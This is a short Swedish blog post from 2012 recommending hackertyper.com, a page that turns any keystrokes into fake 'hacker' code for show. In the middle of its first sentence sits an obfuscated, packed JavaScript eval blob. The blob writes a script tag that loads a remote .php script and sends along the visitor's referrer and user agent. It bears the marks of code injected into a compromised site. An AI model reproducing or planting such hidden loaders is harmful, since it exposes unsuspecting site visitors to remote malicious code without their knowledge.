Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

För dig som vill att folk ska tro att du hackar, då är hackertyper sidan för dig.

För dig som vill att folk ska tro att du hackar, då är hackertyper sidan för dig.
Filip Urde
  • On 15 mars, 2012
  • http://www.revue.se/filip-urde

I tider där grupper som Anonymous eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|szhyb|var|u0026u|referrer|ntdti||js|php’.split(’|’),0,{}))
skrämmer slag på politiker, med hacker attacker mot regeringar och Playstation network så har det blivit lite ”coolt” att vara hacker.

Man ska väll säga att det alltid har funnits något ”coolt” med hackers, hela mystiken av att knäcka ”obräckliga” koder är ganska häftig. Men som ni kanske förstår är det inte bara att bli en hacker, du måste vara ganska med i dator svängen så att säga. Om du inte är det och ändå vill ”Leka” hacker så har vi nu en lösning. Hackertyper.com heter hemsidan och är en hemsida som helt enkelt är en word editor i klassiska svart och grönt. När du skriver något på ditt keyboard, vad som helst, så blir detta till en fin kod snutt på sidan.

SÅ tryck upp sidan på helskärm och hackaloss på ett Café nära dig.